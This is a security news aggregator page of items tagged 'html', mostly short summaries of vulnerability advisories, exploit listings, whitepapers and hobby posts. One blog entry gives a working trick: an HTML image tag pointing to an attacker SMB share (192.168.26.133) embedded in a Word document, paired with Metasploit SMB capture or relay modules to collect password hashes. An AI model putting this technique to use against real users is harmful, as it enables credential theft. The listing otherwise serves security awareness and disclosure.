«
Expand/Collapse
137 items tagged "html"
Related tags:
cross [+],
cms [+],
tomcat [+],
security [+],
manager interface [+],
apache tomcat [+],
apache [+],
webkit [+],
mail [+],
mozilla thunderbird [+],
memory corruption [+],
matt haggard [+],
jesse ruderman [+],
jeff walden [+],
jason oster [+],
igor bukanov [+],
html mail message [+],
gary kwong [+],
cross site scripting [+],
collin jackson [+],
chris rohlf [+],
joomla [+],
code execution [+],
vulnerability [+],
xss [+],
whitelist [+],
web [+],
microsoft [+],
mhonarc [+],
mail conversion [+],
iphone [+],
html mail [+],
forgery [+],
arbitrary code execution [+],
webapps [+],
treasonsms [+],
stack overflow [+],
sql injection [+],
security advisory [+],
scalable vector graphics [+],
red hat security [+],
red [+],
proof of concept [+],
pdf [+],
overflow vulnerability [+],
overflow [+],
mylife [+],
lms [+],
konqueror [+],
insertion [+],
inclusion [+],
import [+],
html engine [+],
docebo [+],
day [+],
css [+],
code checks [+],
code [+],
carchat [+],
attributes [+],
Skype [+],
web security [+],
web developers [+],
vendor [+],
vector [+],
url [+],
technology of the future [+],
springsource [+],
protocol [+],
phpmyadmin [+],
parlic [+],
overview [+],
onreadystatechange event [+],
object pointer [+],
michael schmidt [+],
master thesis [+],
lightneasy [+],
landscape [+],
index [+],
idefense security advisory [+],
html email [+],
hacks [+],
flash [+],
firefox [+],
event [+],
etag [+],
email [+],
dokuwiki [+],
document [+],
design [+],
css styled [+],
creator [+],
cookies [+],
apple safari [+],
abu dhabi [+],
zenphoto [+],
yatta [+],
xoops [+],
wowd [+],
word [+],
wicked [+],
whitewash [+],
webmedia [+],
webmatic [+],
w3c [+],
vulnerabilities [+],
versions [+],
valtnet [+],
use [+],
untrusted source [+],
txt [+],
third party [+],
textads [+],
tag [+],
squirrelmail [+],
sonicwall [+],
smb share [+],
smb [+],
slides [+],
simple [+],
silverstripe [+],
sharetronix [+],
share [+],
session hijacking [+],
sensor data [+],
sensor [+],
security risks [+],
script tag [+],
script [+],
safer use [+],
safari for windows [+],
ruby [+],
rayzz [+],
purifier [+],
problem [+],
poses [+],
php files [+],
php [+],
photoz [+],
photogallery [+],
paper [+],
opennms [+],
office document [+],
nsa [+],
nested [+],
mysql command line [+],
mysql [+],
multiple buffer overflow [+],
module [+],
microsoft word [+],
microcontrollers [+],
microcontroller [+],
memory [+],
man2html [+],
mac os x [+],
mac os [+],
location base [+],
link [+],
latex [+],
lan [+],
knowgate [+],
jenkins [+],
ipad [+],
ios [+],
intern [+],
inbox [+],
idevspot [+],
html tags [+],
html tag [+],
html files [+],
html element [+],
html coder [+],
html button [+],
hipergate [+],
header [+],
hastymail [+],
glfusion [+],
free error [+],
foswiki [+],
fellas [+],
explorer [+],
easyblog [+],
dsa [+],
drupal [+],
document fragments [+],
docmint [+],
development [+],
css clip [+],
corruption [+],
command line client [+],
command [+],
coder [+],
cmscout [+],
capture server [+],
buffer overflow vulnerability [+],
buffer overflow vulnerabilities [+],
buffer overflow [+],
blogbird [+],
binary [+],
bbcode [+],
basic html [+],
basic [+],
avr compiler [+],
atutor [+],
attacking [+],
arduino [+],
ardguest [+],
arcademsx [+],
arcade [+],
apple webkit [+],
apple safari for windows [+],
amaya [+],
Software [+],
Pentesting [+],
Newbie [+],
Area [+],
64 bit windows [+],
injection [+],
multiple [+],
thunderbird [+]
-
-
11:01
»
Hack a Day
It’s surprising what lengths people will go to in order to bring functionality to their smart phones. In this case, [Tadpol] wanted a way to develop for his Arduino on an iOS device like an iPad or iPhone. He figures it’s possible to rewrite the IDE as HTML5, but since that’s a pretty large mountain [...]
-
-
10:01
»
Hack a Day
Writing a paper in LaTeX will always result in beautiful output, but if you’d like to put that document up on the web you’re limited to two reasonable options: serve the document as a .PDF (with the horrors involves, although Chrome makes things much more palatable), or relying on third-party browser plugins like TeX The [...]
-
-
15:08
»
Packet Storm Security Misc. Files
The Whitewash module allows Ruby programs to clean up any HTML document or fragment coming from an untrusted source and to remove all dangerous constructs that could be used for cross-site scripting or request forgery. All HTML tags, attribute names and values, and CSS properties are filtered through a whitelist that defines which names and what kinds of values are allowed; everything that doesn't match the whitelist is removed. The whitelist is provided externally, and the default whitelist is loaded from the whitelist.yaml shipped with Whitewash. The default is the most strict (for example, it does not allow cross-site links to images in IMG tags) and can be considered safe for all uses.
-
-
17:00
»
Packet Storm Security Recent Files
Whitepaper called Overview to HTML5 web security. This article is an extract of the master thesis written by Michael Schmidt. It needs to be considered that the content of this document was released in May 2011.
-
17:00
»
Packet Storm Security Misc. Files
Whitepaper called Overview to HTML5 web security. This article is an extract of the master thesis written by Michael Schmidt. It needs to be considered that the content of this document was released in May 2011.
-
-
21:46
»
Carnal0wnage
Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...
In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.
I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":
[html][body][img src="\\192.168.26.133\share\pwn.jpeg"
width=1 height=1][/body][html]
Once that is done go to insert-->object--text from file-->select your HTML file
Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.
If this doesnt work for anyone let me know.
-
-
9:42
»
Hack a Day
This project shows you one possible way to use HTML5 to fully integrate sensor data from a microcontroller into our technological lives. Now, when we saw this tip come through our inbox we thought it would be an interesting example to learn from but we weren’t ready for how truly cool the setup is. Take [...]
-
-
14:32
»
Packet Storm Security Advisories
Red Hat Security Advisory 2011-1342-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. Several flaws were found in the processing of malformed HTML content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. A flaw was found in the way Thunderbird processed the "Enter" keypress event. A malicious HTML mail message could present a download dialog while the key is pressed, activating the default "Open" action. A remote attacker could exploit this vulnerability by causing the mail client to open malicious web content.
-
14:32
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2011-1342-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. Several flaws were found in the processing of malformed HTML content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. A flaw was found in the way Thunderbird processed the "Enter" keypress event. A malicious HTML mail message could present a download dialog while the key is pressed, activating the default "Open" action. A remote attacker could exploit this vulnerability by causing the mail client to open malicious web content.
-
14:32
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2011-1342-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. Several flaws were found in the processing of malformed HTML content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. A flaw was found in the way Thunderbird processed the "Enter" keypress event. A malicious HTML mail message could present a download dialog while the key is pressed, activating the default "Open" action. A remote attacker could exploit this vulnerability by causing the mail client to open malicious web content.
-
-
21:02
»
Packet Storm Security Advisories
Red Hat Security Advisory 2011-1166-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. Several flaws were found in the processing of malformed HTML content. Malicious HTML content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. A dangling pointer flaw was found in the Thunderbird Scalable Vector Graphics text manipulation routine. An HTML mail message containing a malicious SVG image could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird.
-
21:02
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2011-1166-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. Several flaws were found in the processing of malformed HTML content. Malicious HTML content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. A dangling pointer flaw was found in the Thunderbird Scalable Vector Graphics text manipulation routine. An HTML mail message containing a malicious SVG image could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird.
-
21:02
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2011-1166-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. Several flaws were found in the processing of malformed HTML content. Malicious HTML content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. A dangling pointer flaw was found in the Thunderbird Scalable Vector Graphics text manipulation routine. An HTML mail message containing a malicious SVG image could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird.
-
-
21:18
»
Packet Storm Security Recent Files
Whitepaper called Flash Cookies And Privacy II: Now With HTML5 And ETag Respawning. This is a follow-up study that reassesses the flash cookie landscape and examines a new tracking vector, HTML5 local storage, and cache-cookies via ETags.
-
21:18
»
Packet Storm Security Misc. Files
Whitepaper called Flash Cookies And Privacy II: Now With HTML5 And ETag Respawning. This is a follow-up study that reassesses the flash cookie landscape and examines a new tracking vector, HTML5 local storage, and cache-cookies via ETags.
-
-
2:23
»
SecDocs
Authors:
Lavakumar Kuppan Tags:
web application XSS HTML Event:
Black Hat Abu Dhabi 2010 Abstract: HTML5 is a set of powerful features aimed at moving the web applications closer to existing desktop applications in terms of user experience and features. HTML5 is no more just the technology of the future as many believe, it is available right now in almost all modern browsers. Though the widespread use of HTML5 by websites is still a few years away, the abuse of these features is already possible. Web developers and users assume that just because their site does not implement any HTML5 features they are unaffected. Also a large section of the internet community believes that HTML5 is only about stunning graphics and video streaming. This talk will show how these assumptions are completely contrary to reality. This presentation will show how existing 'HTML4' sites can be attacked using HTML5 features in a number of interesting ways. Then we look at how it is possible to use the browser to perform attacks that were once thought to require code execution outside the sandbox. Finally we look at an attack where the attacker is not interested in the victim's data or a shell on the machine but is instead after something that might perhaps even be legal to steal!
-
2:23
»
SecDocs
Authors:
Lavakumar Kuppan Tags:
web application XSS HTML Event:
Black Hat Abu Dhabi 2010 Abstract: HTML5 is a set of powerful features aimed at moving the web applications closer to existing desktop applications in terms of user experience and features. HTML5 is no more just the technology of the future as many believe, it is available right now in almost all modern browsers. Though the widespread use of HTML5 by websites is still a few years away, the abuse of these features is already possible. Web developers and users assume that just because their site does not implement any HTML5 features they are unaffected. Also a large section of the internet community believes that HTML5 is only about stunning graphics and video streaming. This talk will show how these assumptions are completely contrary to reality. This presentation will show how existing 'HTML4' sites can be attacked using HTML5 features in a number of interesting ways. Then we look at how it is possible to use the browser to perform attacks that were once thought to require code execution outside the sandbox. Finally we look at an attack where the attacker is not interested in the victim's data or a shell on the machine but is instead after something that might perhaps even be legal to steal!
-
-
15:49
»
Packet Storm Security Exploits
Microsoft HTML Help versions 6.1 and below suffer from a stack overflow vulnerability in itss.dll. Proof of concept code is included.
-
8:37
»
Packet Storm Security Exploits
Nth Dimension Security Advisory (NDSA20110321) - Konqueror versions 4.4.x, 4.5.x, and 4.6.x suffer from an HTML injection vulnerability.
-
-
11:22
»
Packet Storm Security Exploits
Joomla! 1.5 and 1.6 rely on the JFilterInput class to sanitize user-supplied html. This class attempts to parse any given string for html code, checks the code against a whitelist of elements and attributes, and strips out any code that is not allowed. However, malformed html code can be used to bypass the filter and inject XSS code into user-supplied input.
-
11:22
»
Packet Storm Security Recent Files
Joomla! 1.5 and 1.6 rely on the JFilterInput class to sanitize user-supplied html. This class attempts to parse any given string for html code, checks the code against a whitelist of elements and attributes, and strips out any code that is not allowed. However, malformed html code can be used to bypass the filter and inject XSS code into user-supplied input.
-
11:22
»
Packet Storm Security Misc. Files
Joomla! 1.5 and 1.6 rely on the JFilterInput class to sanitize user-supplied html. This class attempts to parse any given string for html code, checks the code against a whitelist of elements and attributes, and strips out any code that is not allowed. However, malformed html code can be used to bypass the filter and inject XSS code into user-supplied input.
-
-
9:45
»
Packet Storm Security Exploits
This Metasploit module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution.
-
9:45
»
Packet Storm Security Recent Files
This Metasploit module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution.
-
9:45
»
Packet Storm Security Misc. Files
This Metasploit module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution.
-
-
22:17
»
Packet Storm Security Exploits
This Metasploit module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution.
-
-
14:01
»
Packet Storm Security Recent Files
Ubuntu Security Notice 978-2 - USN-978-1 fixed vulnerabilities in Thunderbird. Some users reported stability problems under certain circumstances. This update fixes the problem. Several dangling pointer vulnerabilities were discovered in Thunderbird. It was discovered that the XPCSafeJSObjectWrapper (SJOW) security wrapper did not always honor the same-origin policy. Matt Haggard discovered that Thunderbird did not honor same-origin policy when processing the statusText property of an XMLHttpRequest object. Chris Rohlf discovered an integer overflow when Thunderbird processed the HTML frameset element. Several issues were discovered in the browser engine. David Huang and Collin Jackson discovered that the tag could override the charset of a framed HTML document in another origin. Paul Stone discovered that with designMode enabled an HTML selection containing JavaScript could be copied and pasted into a document and have the JavaScript execute within the context of the site where the code was dropped. A buffer overflow was discovered in Thunderbird when processing text runs. Peter Van der Beken, Jason Oster, Jesse Ruderman, Igor Bukanov, Jeff Walden, Gary Kwong and Olli Pettay discovered several flaws in the browser engine.
-
14:01
»
Packet Storm Security Advisories
Ubuntu Security Notice 978-2 - USN-978-1 fixed vulnerabilities in Thunderbird. Some users reported stability problems under certain circumstances. This update fixes the problem. Several dangling pointer vulnerabilities were discovered in Thunderbird. It was discovered that the XPCSafeJSObjectWrapper (SJOW) security wrapper did not always honor the same-origin policy. Matt Haggard discovered that Thunderbird did not honor same-origin policy when processing the statusText property of an XMLHttpRequest object. Chris Rohlf discovered an integer overflow when Thunderbird processed the HTML frameset element. Several issues were discovered in the browser engine. David Huang and Collin Jackson discovered that the tag could override the charset of a framed HTML document in another origin. Paul Stone discovered that with designMode enabled an HTML selection containing JavaScript could be copied and pasted into a document and have the JavaScript execute within the context of the site where the code was dropped. A buffer overflow was discovered in Thunderbird when processing text runs. Peter Van der Beken, Jason Oster, Jesse Ruderman, Igor Bukanov, Jeff Walden, Gary Kwong and Olli Pettay discovered several flaws in the browser engine.
-
-
21:01
»
Packet Storm Security Recent Files
Ubuntu Security Notice 975-1 - Several dangling pointer vulnerabilities were discovered in Firefox. Blake Kaplan and Michal Zalewski discovered several weaknesses in the XPCSafeJSObjectWrapper (SJOW) security wrapper. Matt Haggard discovered that Firefox did not honor same-origin policy when processing the statusText property of an XMLHttpRequest object. Chris Rohlf discovered an integer overflow when Firefox processed the HTML frameset element. Several issues were discovered in the browser engine. David Huang and Collin Jackson discovered that the tag could override the charset of a framed HTML document in another origin. Paul Stone discovered that with designMode enabled an HTML selection containing JavaScript could be copied and pasted into a document and have the JavaScript execute within the context of the site where the code was dropped. A buffer overflow was discovered in Firefox when processing text runs. Peter Van der Beken, Jason Oster, Jesse Ruderman, Igor Bukanov, Jeff Walden, Gary Kwong and Olli Pettay discovered several flaws in the browser engine.
-
21:01
»
Packet Storm Security Recent Files
Ubuntu Security Notice 978-1 - Several dangling pointer vulnerabilities were discovered in Thunderbird. It was discovered that the XPCSafeJSObjectWrapper (SJOW) security wrapper did not always honor the same-origin policy. Matt Haggard discovered that Thunderbird did not honor same-origin policy when processing the statusText property of an XMLHttpRequest object. Chris Rohlf discovered an integer overflow when Thunderbird processed the HTML frameset element. Several issues were discovered in the browser engine. David Huang and Collin Jackson discovered that the tag could override the charset of a framed HTML document in another origin. Paul Stone discovered that with designMode enabled an HTML selection containing JavaScript could be copied and pasted into a document and have the JavaScript execute within the context of the site where the code was dropped. A buffer overflow was discovered in Thunderbird when processing text runs. Peter Van der Beken, Jason Oster, Jesse Ruderman, Igor Bukanov, Jeff Walden, Gary Kwong and Olli Pettay discovered several flaws in the browser engine.
-
21:01
»
Packet Storm Security Advisories
Ubuntu Security Notice 975-1 - Several dangling pointer vulnerabilities were discovered in Firefox. Blake Kaplan and Michal Zalewski discovered several weaknesses in the XPCSafeJSObjectWrapper (SJOW) security wrapper. Matt Haggard discovered that Firefox did not honor same-origin policy when processing the statusText property of an XMLHttpRequest object. Chris Rohlf discovered an integer overflow when Firefox processed the HTML frameset element. Several issues were discovered in the browser engine. David Huang and Collin Jackson discovered that the tag could override the charset of a framed HTML document in another origin. Paul Stone discovered that with designMode enabled an HTML selection containing JavaScript could be copied and pasted into a document and have the JavaScript execute within the context of the site where the code was dropped. A buffer overflow was discovered in Firefox when processing text runs. Peter Van der Beken, Jason Oster, Jesse Ruderman, Igor Bukanov, Jeff Walden, Gary Kwong and Olli Pettay discovered several flaws in the browser engine.
-
21:01
»
Packet Storm Security Advisories
Ubuntu Security Notice 978-1 - Several dangling pointer vulnerabilities were discovered in Thunderbird. It was discovered that the XPCSafeJSObjectWrapper (SJOW) security wrapper did not always honor the same-origin policy. Matt Haggard discovered that Thunderbird did not honor same-origin policy when processing the statusText property of an XMLHttpRequest object. Chris Rohlf discovered an integer overflow when Thunderbird processed the HTML frameset element. Several issues were discovered in the browser engine. David Huang and Collin Jackson discovered that the tag could override the charset of a framed HTML document in another origin. Paul Stone discovered that with designMode enabled an HTML selection containing JavaScript could be copied and pasted into a document and have the JavaScript execute within the context of the site where the code was dropped. A buffer overflow was discovered in Thunderbird when processing text runs. Peter Van der Beken, Jason Oster, Jesse Ruderman, Igor Bukanov, Jeff Walden, Gary Kwong and Olli Pettay discovered several flaws in the browser engine.
-
-
0:31
»
SecuriTeam
A vulnerability was discovered in Apple Safari for Windows, Mac OS X and iPhone.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
10:00
»
Packet Storm Security Recent Files
iDefense Security Advisory 03.30.10 - Remote exploitation of a use after free vulnerability in Microsoft Corp.'s Internet Explorer could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when an HTML object with an 'onreadystatechange' event handler is not properly freed. This event is used to perform actions when the state of some HTML object changes; for example, when a form has data input. Specifically, when certain properties of the object are changed, the event handler function object is freed, but a reference to it remains. When the object is later accessed, this invalid memory is treated as an object pointer, and one of its members is used to make an indirect function call. This results in the execution of arbitrary code.
-
10:00
»
Packet Storm Security Advisories
iDefense Security Advisory 03.30.10 - Remote exploitation of a use after free vulnerability in Microsoft Corp.'s Internet Explorer could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when an HTML object with an 'onreadystatechange' event handler is not properly freed. This event is used to perform actions when the state of some HTML object changes; for example, when a form has data input. Specifically, when certain properties of the object are changed, the event handler function object is freed, but a reference to it remains. When the object is later accessed, this invalid memory is treated as an object pointer, and one of its members is used to make an indirect function call. This results in the execution of arbitrary code.
-
-
13:20
»
SecuriTeam
Remote exploitation of a memory corruption vulnerability in WebKit, as included with multiple vendors' browsers, could allow an attacker to execute arbitrary code with the privileges of the current user.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
9:16
»
remote-exploit & backtrack
I'm trying to check out some pages to spoof on a LAN and have one little problem:
I've checked in /var/www/ and cannot find the index.html file. LOL...big problem.
Okay, so I have three folders in this location: base, squid-reports, and unicornscan. There are two .php files in these folders named index but no html files.
Please fellas, comment and help me find it!
1337day (was: Inj3ct0r, 1337db)
OSVDB Vulnerabilities
Exploit-DB
SecurityFocus Vulnerabilities
Bugtraq
XSSed
Sophos security news
Penetration Testing
BackTrack Linux Forums
Threatpost
carnal0wnage.attackresearch.com
Darknet
The Exploitant
Wirevolution
15:00